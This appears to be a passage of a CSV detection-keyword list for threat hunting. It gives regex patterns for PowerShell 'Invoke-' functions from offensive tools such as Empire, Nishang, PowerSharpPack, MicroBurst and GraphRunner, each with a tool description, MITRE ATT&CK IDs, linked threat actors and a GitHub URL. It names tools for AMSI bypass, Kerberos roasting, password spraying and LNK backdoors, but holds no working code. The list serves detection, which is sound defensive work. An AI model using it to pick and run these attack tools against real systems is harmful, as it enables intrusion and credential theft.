"*Invoke-AllAccessChecks*",".{0,1000}Invoke\-AllAccessChecks.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48824"
"*Invoke-AllChecks*",".{0,1000}Invoke\-AllChecks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48825"
"*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48826"
"*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48827"
"*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48828"
"*Invoke-APIConnectionHijack.ps1*",".{0,1000}Invoke\-APIConnectionHijack\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48829"
"*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48830"
"*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48831"
"*Invoke-ArgFuscator -*",".{0,1000}Invoke\-ArgFuscator\s\-.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48832"
"*Invoke-ArgFuscator.ps1*",".{0,1000}Invoke\-ArgFuscator\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48833"
"*Invoke-ArgFuscator.psd1*",".{0,1000}Invoke\-ArgFuscator\.psd1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48834"
"*Invoke-ArgFuscator.psm1*",".{0,1000}Invoke\-ArgFuscator\.psm1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48835"
"*Invoke-ArgFuscator-main.zip*",".{0,1000}Invoke\-ArgFuscator\-main\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48836"
"*Invoke-ARPScan*",".{0,1000}Invoke\-ARPScan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ARPScan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48837"
"*invoke-arpscan*",".{0,1000}invoke\-arpscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48838"
"*Invoke-ARPScan.ps1*",".{0,1000}Invoke\-ARPScan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48839"
"*Invoke-ASREPRoast*",".{0,1000}Invoke\-ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","48840"
"*Invoke-Assembly.ps1*",".{0,1000}Invoke\-Assembly\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48841"
"*InvokeAssembly.x64.dll*",".{0,1000}InvokeAssembly\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48842"
"*Invoke-AutoKerberoast*",".{0,1000}Invoke\-AutoKerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","48843"
"*Invoke-AutoOAuthFlow*",".{0,1000}Invoke\-AutoOAuthFlow.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Automates the OAuth flow completion to obtain access and refresh keys when a user grants consent to an app registration","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48844"
"*Invoke-AutoTokenRefresh*access_token.txt*",".{0,1000}Invoke\-AutoTokenRefresh.{0,1000}access_token\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48845"
"*Invoke-AzElevatedAccessToggle*",".{0,1000}Invoke\-AzElevatedAccessToggle.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48846"
"*Invoke-AzRESTBastionShareableLink*",".{0,1000}Invoke\-AzRESTBastionShareableLink.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48847"
"*Invoke-AzureAdPasswordSprayAttack*",".{0,1000}Invoke\-AzureAdPasswordSprayAttack.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","48848"
"*Invoke-AzureEnum.ps1*",".{0,1000}Invoke\-AzureEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Discovery","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","N/A","6","520","92","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z","48849"
"*Invoke-AzurePasswordSpray*",".{0,1000}Invoke\-AzurePasswordSpray.{0,1000}","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","N/A","6","520","92","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z","48850"
"*Invoke-AzureRmVMBulkCMD.ps1*",".{0,1000}Invoke\-AzureRmVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48851"
"*Invoke-AzVMBulkCMD.ps1*",".{0,1000}Invoke\-AzVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48852"
"*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BackdoorLNK.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48853"
"*Invoke-BackdoorLNK.ps1*",".{0,1000}Invoke\-BackdoorLNK\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48854"
"*Invoke-BadPotato*",".{0,1000}Invoke\-BadPotato.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48855"
"*Invoke-BadZure*",".{0,1000}Invoke\-BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","48856"
"*Invoke-BetterSafetyKatz*",".{0,1000}Invoke\-BetterSafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48857"
"*Invoke-BetterXencrypt*",".{0,1000}Invoke\-BetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","48858"
"*Invoke-Binary *.exe*",".{0,1000}Invoke\-Binary\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","48859"
"*Invoke-BitlockerCheck*",".{0,1000}Invoke\-BitlockerCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48860"
"*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48861"
"*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48862"
"*Invoke-BloodHound -CollectionMethod*",".{0,1000}Invoke\-BloodHound\s\-CollectionMethod.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","48863"
"*Invoke-BloodHound -CollectionMethods *",".{0,1000}Invoke\-BloodHound\s\-CollectionMethods\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48864"
"*InvokeBloodHound*",".{0,1000}InvokeBloodHound.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","48865"
"*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","48866"
